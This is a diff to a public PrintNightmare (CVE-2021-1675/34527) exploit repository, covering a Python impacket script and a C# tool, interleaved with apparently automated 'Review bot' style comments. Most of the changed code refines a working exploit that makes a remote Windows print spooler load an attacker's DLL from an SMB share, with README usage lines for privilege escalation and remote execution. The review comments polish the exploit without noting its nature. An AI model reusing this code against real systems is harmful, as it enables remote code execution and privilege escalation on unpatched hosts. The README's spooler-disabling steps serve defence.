diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py
index 7f5d527..1807985 100644
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL
 from impacket.structure import Structure
 import argparse
 import sys
-import time
 import pathlib
 #https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
@@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL):
 return blob
-def main(username, password, domain, lmhash, nthash, address, port, share):
- #connect
- dce = connect(username, password, domain, lmhash, nthash, address, port)
- #handle = "\\\\{0}\x00".format(address)
- handle = NULL
-
- #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
- try:
- blob = getDrivers(dce, handle)
- pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
- except Exception as e:
- print('[-] Failed to enumerate remote pDriverPath')
- print(str(e))
- sys.exit(1)
-
- print("[+] pDriverPath Found {0}".format(pDriverPath))
-
+def main(dce, pDriverPath, share):
 #build DRIVER_CONTAINER package
 container_info = rprn.DRIVER_CONTAINER()
 container_info['Level'] = 2
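Review bot: The new signature `def main(dce, pDriverPath, share):` drops the local `handle` that the removed body used to assign, but `main` still passes `pName=handle` to `hRpcAddPrinterDriverEx` (next hunk); the name now resolves only through the module-level `handle = NULL` set inside the `__main__` block, which is a hidden dependency that breaks the moment `main` is called from anywhere else. Making it an explicit parameter keeps the function self-contained: `def main(dce, pDriverPath, share, handle=NULL):`. A one-line docstring stating that `dce` must already be a connected RPC binding and that `pDriverPath` is the resolved driver path would also help, since both were previously computed inside this function. The body of `main` continues past the end of this hunk.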
@@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
 container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
 container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
 container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
- container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
-
+ container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
+
 flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
 filename = share.split("\\")[-1]
- print("[*] Executing {0}".format(share))
 resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
 print("[*] Stage0: {0}".format(resp['ErrorCode']))
+
+ container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
 for i in range(1, 30):
 try:
 container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
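Review bot: The added `container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"` directly above the `for` loop is dead code: the first statement of every iteration reassigns `pConfigFile`, and `range(1, 30)` always runs at least once, so the value is overwritten before anything can read it. Either drop the line or, if it is intended as a reset for a path that exists outside this hunk, say so in a comment such as `# reset pConfigFile before the per-iteration values below overwrite it`. The same pattern appears in Program.cs in the `@@ -141,6 +143,8 @@` hunk, where the `Level2.pConfigFile` assignment also precedes a loop that looks like it reassigns the field (that loop body is outside the hunk, so this is inferred). The `for` body here likewise continues past the end of this hunk.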
@@ -118,9 +102,11 @@ if __name__ == '__main__':
 parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
 Example;
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
+./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
 """)
 parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')
 parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
+ parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
 group = parser.add_argument_group('authentication')
 group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
 group = parser.add_argument_group('connection')
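Review bot: The new example line in the epilog writes the share as `'\\\\192.168.1.215\smb\\addCube.dll'`; inside this non-raw triple-quoted string `\s` is an invalid escape sequence (a DeprecationWarning, and a SyntaxWarning on newer interpreters) and it is inconsistent with `\\smb` on the example line directly above it. Use `'\\\\192.168.1.215\\smb\\addCube.dll'` so both examples escape the same way and render identically in `--help`. The added `pDriverPath` help string is fine as written, since every backslash in it is doubled.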
@@ -161,12 +147,34 @@ Example;
 lmhash = ''
 nthash = ''
+ #connect
+ dce = connect(username, password, domain, lmhash, nthash, options.target_ip, options.port)
+ #handle = "\\\\{0}\x00".format(address)
+ handle = NULL
+
+ #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
+ if not options.pDriverPath:
+ try:
+ blob = getDrivers(dce, handle)
+ pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
+ if not "filerepository" in pDriverPath:
+ print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
+ print("[-] Specify pDriverPath manually")
+ sys.exit(1)
+ except Exception as e:
+ print('[-] Failed to enumerate remote pDriverPath')
+ print(str(e))
+ sys.exit(1)
+ else:
+ pDriverPath = options.pDriverPath
+
+ print("[+] pDriverPath Found {0}".format(pDriverPath))
+ print("[*] Executing {0}".format(options.share))
+
 #re-run if stage0/stageX fails
 print("[*] Try 1...")
- main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
- time.sleep(10)
+ main(dce, pDriverPath, options.share)
 print("[*] Try 2...")
- main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
- time.sleep(10)
+ main(dce, pDriverPath,options.share)
 print("[*] Try 3...")
- main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
\ No newline at end of file
+ main(dce, pDriverPath,options.share)
\ No newline at end of file
diff --git a/README.md b/README.md
index 70d1568..5b7885d 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# CVE-2021-1675
+# CVE-2021-1675 / CVE-2021-34527
 Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
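Review bot: `if not "filerepository" in pDriverPath:` should use the `not in` operator, `if "filerepository" not in pDriverPath:`, which every common linter flags. The three replacement `main(...)` calls are copy-pasted with inconsistent spacing (`pDriverPath,options.share` in two of them); a loop keeps the attempt count in one place and reads as one unit: `for attempt in range(1, 4):` / `print("[*] Try {0}...".format(attempt))` / `main(dce, pDriverPath, options.share)`. The retained comment `#re-run if stage0/stageX fails` no longer describes the code, which now runs all three attempts unconditionally and back to back; `#run three attempts unconditionally` would match what happens. The file also still ends without a trailing newline.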
@@ -86,9 +86,9 @@ REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_
 ### Scanning
-We can use `rpcdump.py` from impacket to scan for vulnerable hosts, if it returns a value, it's vulnerable
+We can use `rpcdump.py` from impacket to scan for potential vulnerable hosts, if it returns a value, it could be vulnerable
-```
+```bash
 rpcdump.py @192.168.1.10 | grep MS-RPRN
 Protocol: [MS-RPRN]: Print System Remote Protocol
@@ -100,7 +100,7 @@ Disable Spooler service
 ```powershell
 Stop-Service Spooler
-REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REG_DWORD /d "4" /f
+REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
 ```
 Or Uninstall Print-Services
diff --git a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
deleted file mode 100644
index aad948e..0000000
Binary files a/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo and /dev/null differ
diff --git a/SharpPrintNightmare/README.md b/SharpPrintNightmare/README.md
index 0350366..28f743d 100644
--- a/SharpPrintNightmare/README.md
+++ b/SharpPrintNightmare/README.md
@@ -1,7 +1,9 @@
-# C# Implementation of CVE-2021-1675
+# C# Implementation of CVE-2021-1675 / CVE-2021-34527
 ### Usage
+The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
+
 ```
 #LPE
 C:\SharpPrintNightmare.exe C:\addCube.dll
diff --git a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
deleted file mode 100644
index ce63ce0..0000000
Binary files a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo and /dev/null differ
diff --git a/SharpPrintNightmare/SharpPrintNightmare/Program.cs b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
index a03d26c..f787dfc 100644
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@@ -82,13 +82,17 @@ namespace SharpPrintNightmare
 break;
 }
 }
- //lucky shot
+ //could not find driver path
 if (pDriverPath == "")
 {
- pDriverPath = drivers[0].pDriverPath;
+ Console.WriteLine($"[-] [-] pDriverPath {pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
+ Console.WriteLine($"[-] Specify pDriverPath manually");
+ Environment.Exit(1);
 }
- pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL";
 }
+ Console.WriteLine($"[*] pDriverPath {pDriverPath}");
+ Console.WriteLine($"[*] Executing {dllpath}");
+
 if (args.Length > 2)
 {
 path = args[2];
@@ -117,13 +121,11 @@ namespace SharpPrintNightmare
 //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
 //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
- Console.WriteLine($"[*] pDriverPath {pDriverPath}");
- Console.WriteLine($"[*] Executing {dllpath}");
 //DRIVER_INFO_2 Level2 = drivers[0]; // debug
 DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
 Level2.cVersion = 3;
- Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
+ Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp
 Level2.pDataFile = dllpath;
 Level2.pDriverPath = pDriverPath;
 Level2.pEnvironment = "Windows x64";
@@ -141,6 +143,8 @@ namespace SharpPrintNightmare
 Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
 Marshal.FreeHGlobal(pnt);
+ //Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\
+ Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
 for (int i = 1; i <= 30; i++)
 {
 //add path to our exploit
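Review bot: Inside the `if (pDriverPath == "")` branch the new message `$"[-] [-] pDriverPath {pDriverPath}, expected ..."` doubles the `[-]` prefix and interpolates a value the guard has just established to be empty, so the user reads `pDriverPath ,` with nothing in it. The second line, `$"[-] Specify pDriverPath manually"`, has no placeholders and does not need the `$`. Suggest `Console.WriteLine("[-] No driver path found, expected one under :\\Windows\\System32\\DriverStore\\FileRepository\\.....");` and `Console.WriteLine("[-] Specify pDriverPath manually");`. The enclosing method begins before this hunk.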
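Review bot: The new comment `//Specify a dll that does not exists in C:\\Windows\\System32\\spool\\drivers\\x64\\3\\` in the `@@ -141,6 +143,8 @@` hunk has a grammar slip and carries string-literal style doubled backslashes that a comment does not need; `//Specify a dll that does not exist in C:\Windows\System32\spool\drivers\x64\3\` reads cleanly. The `for` loop it precedes continues past the end of this hunk, so whether the assignment below the comment outlives the first iteration cannot be confirmed from here.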